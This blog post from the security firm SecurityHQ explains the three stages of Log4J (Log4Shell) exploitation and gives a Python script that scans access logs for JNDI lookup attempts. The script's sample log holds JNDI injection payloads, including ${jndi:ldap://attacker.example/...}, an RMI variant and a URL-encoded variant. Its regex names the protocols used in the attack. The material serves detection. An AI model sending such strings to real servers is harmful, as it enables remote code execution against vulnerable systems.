25 May 2022

How to mitigate the critical Log4J vulnerability exploitation

On 10 December, a new critical vulnerability commonly known as Log4J was disclosed, allowing unauthenticated remote code execution. SecurityHQ predicts that the ease of exploitation, together with the vast range of affected vendors, is the perfect recipe for a fresh wave of Ransomware, just in time for Christmas!

Log4j 2 is an open-source Java logging library developed by the Apache Foundation. The actively exploited zero-day vulnerability in this Java-based logging library has been seen used to execute malicious code and take over vulnerable systems.

A seemingly endless list of affected vendors can be tracked on GitHub. Please sit down before viewing this page!

You can read about the vulnerability on numerous vendor websites; however, we wanted to provide real insight into the real-world exploitation method that we are currently observing in the wild.

So, here’s how the attack is likely to play out…

Stage 1: Attacker Injects an Absolute URL to a Vulnerable JNDI Lookup Method

The first stage of the attack involves the attacker creating a specially crafted request that reaches the vulnerable JNDI lookup. The attacker is likely to use an LDAP request via the JNDI Java framework.

Stage 2: Successful Response

If Stage 1 is successful, you will observe a 20X web server response code, indicating the server has responded. The server has now started a lookup that resolves the injected string, which allows the attacker's Base64-encoded payload to be decoded and executed on the target system.

Stage 3: System Compromise

Now, as they say, the world is his oyster. From here on, the attacker may use any number of tools and frameworks, such as PowerShell, to perform remote code execution and gain access to the server.
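The three stages above map onto two signals a defender can pull straight out of a web server access log: a request carrying a JNDI lookup string (Stage 1) and, for that same request, a 20X status (the Stage 2 indicator the text describes). The following is an added example written for this article, not SecurityHQ's tooling or a Log4j component: it parses constructed Apache combined-format log lines, URL-decodes each user-controlled field, flags JNDI lookups with an LDAP, LDAPS, RMI, DNS, IIOP, CORBA, NDS or HTTP scheme, and labels each hit by whether the server answered 20X. The log lines, IP addresses and the host `attacker.example` are constructed sample data.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format access log lines (sample data, not from a real incident).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Dec/2021:14:02:12 +0000] "GET /login?user=${jndi:ldap://attacker.example/a} HTTP/1.1" 200 17 "-" "curl/7.79"
198.51.100.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 17 "-" "${jndi:rmi://attacker.example:1099/b}"
198.51.100.9 - - [10/Dec/2021:14:02:14 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79"
"""

# Fields of the combined log format: client IP, timestamp, request line, status, size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A JNDI lookup string followed by one of the schemes a JNDI provider can resolve.
JNDI_RE = re.compile(
    r'\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|http)\s*:',
    re.IGNORECASE,
)

# Every field an attacker controls is a candidate, since Log4j may log any of them.
USER_CONTROLLED_FIELDS = ("req", "ref", "ua")


def normalize(field: str) -> str:
    """URL-decode up to twice so %24%7B... becomes ${... before matching."""
    out = field
    for _ in range(2):
        decoded = unquote(out)
        if decoded == out:
            break
        out = decoded
    return out


def scan_line(line: str):
    """Return a finding dict for a line carrying a JNDI lookup, else None."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    hit_fields = [name for name in USER_CONTROLLED_FIELDS
                  if JNDI_RE.search(normalize(m.group(name)))]
    if not hit_fields:
        return None
    status = int(m.group("status"))
    # Stage 2 in the article: the server answered 20X to the crafted request.
    stage = "stage2_server_responded_20x" if 200 <= status < 300 else "stage1_attempt"
    return {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "fields": hit_fields,
        "status": status,
        "stage": stage,
    }


def scan_log(text: str):
    """Scan a whole log and return findings in line order."""
    findings = []
    for line in text.splitlines():
        finding = scan_line(line)
        if finding:
            findings.append(finding)
    return findings


def count_by_source(findings):
    """Aggregate findings per client IP, which is what an analyst triages first."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for r in results:
        print(f'{r["timestamp"]} {r["ip"]} status={r["status"]} '
              f'fields={",".join(r["fields"])} {r["stage"]}')
    print("per-source counts:", count_by_source(results))
```

Run against the sample, the benign first line is ignored, the two 200 responses are labelled as Stage 2 signals, and the URL-encoded request with a 404 is still caught as a Stage 1 attempt. A 20X status alone does not prove the lookup fired, because the application may log the string and answer 200 regardless; the stronger confirmation is an outbound LDAP, RMI or similar connection from the application host to the injected hostname, so pair this log check with egress monitoring.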

For more information, watch this video on Log4J Vulnerability Exploitation by Swapnil Bhosale, Security Consultant from SecurityHQ, for a demonstration of the Log4J vulnerability, with recommendations on how to mitigate the threat.

To report an incident, do so here. Or, for more information regarding the attack as it continues to evolve, contact a security expert.

Authors: Eleanor Barlow, Priyanka Agarwal, Swapnil Bhosale, Chris Cheyne

Company info: SecurityHQ